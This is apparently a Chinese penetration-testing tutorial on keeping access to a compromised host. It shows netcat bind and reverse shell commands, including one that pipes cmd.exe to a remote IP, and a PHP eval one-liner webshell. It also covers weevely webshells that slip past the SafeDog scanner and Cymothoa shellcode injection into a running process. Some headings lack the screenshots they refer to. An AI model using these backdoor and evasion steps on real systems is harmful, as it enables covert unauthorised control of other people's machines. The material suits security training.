维持访问
在获得了目标系统的访问权之后,攻击者需要进一步维持这一访问权限。使用木马程序、后门程序和rootkit来达到这一目的。维持访问是一种艺术形式,思想比渗透更加重要。
Netcat
NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end) 工具,能被其它的程序或脚本直接地或容易地驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能。NetCat小巧且功能强大,可谓是居家旅行出门必备的“瑞士军刀”。
一般我们使用netcat做的最多的事情为以下三种:
实例演示:NC反弹CMDShell
常用语法简单介绍
扫描常用
流量处理
正向连接
采用正向连接方式,远程主机(注:假设IP地址为 192.168.1.1)上执行上述命令即为绑定远程主机的 CMD 到1234 端口,当本地主机连接远程主机成功时就会返回给本地主机一个CMD Shell 。
反向连接
采用反向连接方式,先在本地主机运行 nc -l –vv -p 1234 开启1234 端口并监听等待远程主机连接;在远程主机上运行 nc -t -e cmd.exe 192.168.1.2 1234 将远程主机的 CMD 重定向到 IP 地址为 192.168.1.2(即本机) 端口号为1234 的主机上,连接成功后 IP 地址为 192.168.1.2 的主机会得到一个CMDShell。
NC反弹CMDShell
在Web渗透中,有时候拿到了webshell,我们经常会执行很多命令进行提权等操作,但当我们要尝试很多命令的时候,使用webshell执行cmd往往没有本地执行方便,Web程序不稳定,容易崩溃。因此可以借助Webshell通过NC反弹Cmdshell。
#例如已经得到一只webshell如图
小结
简单看了下,得知:
关于判断CDN、找出CDN下真实IP的方法,有兴趣的话也许可以看下这篇文章:
通过以上信息,那么思路可以如下:步骤简单演示
【本地】成功得到CMDShell,即在本地可直接执行CMD
Cryptcat
Netcat隧道加密之Cryptcat,正所谓菜刀砍狗头,渗透信猫流,狗和猫常常是相互的,比如安全狗。cryptcat与netcat最主要区别就是,通过隧道在传输数据时,它传输的数据经过了加密。
Cryptcat是经典网络工具netcat的加密版,使用twofish算法加密,其密钥协商过程基于发送、接收双发共享的一个password。Cryptcat用法基本和NC相近,不过多介绍了。
weevely
weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身,仅用于安全学习教学之用,禁止非法用途),可以算作是linux下的一款菜刀替代工具(限于php)。使用weevely生成的shell免杀能力很强,并使用加密连接,往往能轻松突破防火墙拦截。
概要:常用语法简单介绍
实例演示:一句话木马突破“安全狗”
输入weevely generate可查看帮助
#从提示中可以看到
1. 将安全狗的网马库更新到最新后,再进行常规扫描,扫描结果为“未发现网页木马及其他危险文件”,即一切正常
2. 手动在网站目录下随便添加一句话木马,命名为test.php,结果显然会被杀
1
|
test.php <?php @eval($_POST['c']);?>
|
#通过weevely生成一句话木马
weevely generate test /root/Desktop/test.php
(#test为密码,/root/Desktop/test.php输出路径)
3. 将生成的木马放到网站根目录,替换原来的test.php
4. 将生成的木马放到网站根目录,替换原来的test.php,并重新扫描
5. 通过weevely连接一句话木马,可直接执行CMD
1
|
weevely http://www.xxx.cn/test.php test
|
cymothoa
Cymothoa 是一款可以将 shellcode 注入到现有进程的(即插进程)后门工具。借助这种注入手段,它能够把shellcode伪装成常规程序。它所注入的后门程序应当能够与被注入的程序(进程)共存,以避免被管理和维护人员怀疑。将shellcode注入到其他进程,还有另外一项优势:即使目标系统的安全防护工具能够监视可执行程序的完整性,只要它不检测内存,那么它就不能发现(插进程)后门程序的进程。
很赞的点是注入到的进程,只要有权限就行,然后反弹的也就是进程相应的权限(并不需要root那样),当然进程重启或者挂了也就没了.当然动作也是很明显的。
实例演示:利用Cymothoa注入后门
1. 首先可先查看程序PID(*nix系统 ps ,windows系统 tasklist)
2. 在使用Cymothoa时,须通过-p 选项指定目标进程的PID,并通过-s选项指定Shellcode的编号。例如对bash进程进行注入。
查看:
1
|
cymothoa -S
|
比如对bash进行注入
1
|
cymothoa -p 8150 <span class="hljs-_">-s</span> 0 -y 1001
|
3. 注入成功后如上图,其中 -y 代表开放后门端口
4.可以看到注入成功后开了rpc。。
*本文原创作者:sysorem